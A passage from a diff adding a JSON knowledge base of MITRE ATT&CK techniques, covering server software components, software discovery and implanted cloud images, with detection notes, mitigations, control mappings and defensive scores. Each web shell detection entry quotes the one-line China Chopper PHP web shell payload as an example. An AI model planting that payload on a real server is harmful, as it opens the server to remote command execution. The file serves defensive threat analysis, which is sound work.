+                "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ",
+                "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1505.003",
+                "name": "Server Software Component: Web Shell",
+                "url": "https://attack.mitre.org/techniques/T1505/003",
+                "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) ",
+                "detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1505.004",
+                "name": "Server Software Component: IIS Components",
+                "url": "https://attack.mitre.org/techniques/T1505/004",
+                "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)",
+                "detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.4623017723809524,
+        "adjusted_score": 0.4623017723809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SA-10",
+            "SA-11",
+            "SC-16",
+            "SI-14",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3523809523809524,
+            "mitigation_score": 0.5818181818181818,
+            "detection_score": 0.1
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00992082
+    },
+    {
+        "tid": "T1505.001",
+        "name": "Server Software Component: SQL Stored Procedures",
+        "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ",
+        "url": "https://attack.mitre.org/techniques/T1505/001",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
+        "platforms": [
+            "Linux",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1505",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.319047619047619,
+        "adjusted_score": 0.319047619047619,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-5",
+            "SA-10",
+            "SA-11",
+            "SI-14",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1505.002",
+        "name": "Server Software Component: Transport Agent",
+        "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ",
+        "url": "https://attack.mitre.org/techniques/T1505/002",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.",
+        "platforms": [
+            "Linux",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1505",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.4190476190476191,
+        "adjusted_score": 0.4190476190476191,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SA-10",
+            "SA-11",
+            "SC-16",
+            "SI-14",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1505.003",
+        "name": "Server Software Component: Web Shell",
+        "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) ",
+        "url": "https://attack.mitre.org/techniques/T1505/003",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1505",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.35238095238095235,
+        "adjusted_score": 0.35238095238095235,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1505.004",
+        "name": "Server Software Component: IIS Components",
+        "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)",
+        "url": "https://attack.mitre.org/techniques/T1505/004",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1505",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-17",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SA-10",
+            "SA-11",
+            "SC-7",
+            "SI-14",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1518",
+        "name": "Software Discovery",
+        "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
+        "url": "https://attack.mitre.org/techniques/T1518",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Firewall: Firewall Enumeration",
+            "Firewall: Firewall Metadata",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1518.001",
+                "name": "Software Discovery: Security Software Discovery",
+                "url": "https://attack.mitre.org/techniques/T1518/001",
+                "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [],
+        "cumulative_score": 0.1626814238095238,
+        "adjusted_score": 0.1626814238095238,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.023809523809523808,
+            "detection_score": 0.05
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.0388719
+    },
+    {
+        "tid": "T1518.001",
+        "name": "Software Discovery: Security Software Discovery",
+        "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)",
+        "url": "https://attack.mitre.org/techniques/T1518/001",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Firewall: Firewall Enumeration",
+            "Firewall: Firewall Metadata",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1518",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.13333333333333333,
+        "adjusted_score": 0.13333333333333333,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1525",
+        "name": "Implant Internal Image",
+        "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)",
+        "url": "https://attack.mitre.org/techniques/T1525",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ",
+        "platforms": [
+            "Containers",
+            "IaaS"
+        ],
+        "data_sources": [
+            "Image: Image Creation",
+            "Image: Image Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.3429840628571429,
+        "adjusted_score": 0.3429840628571429,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-9",
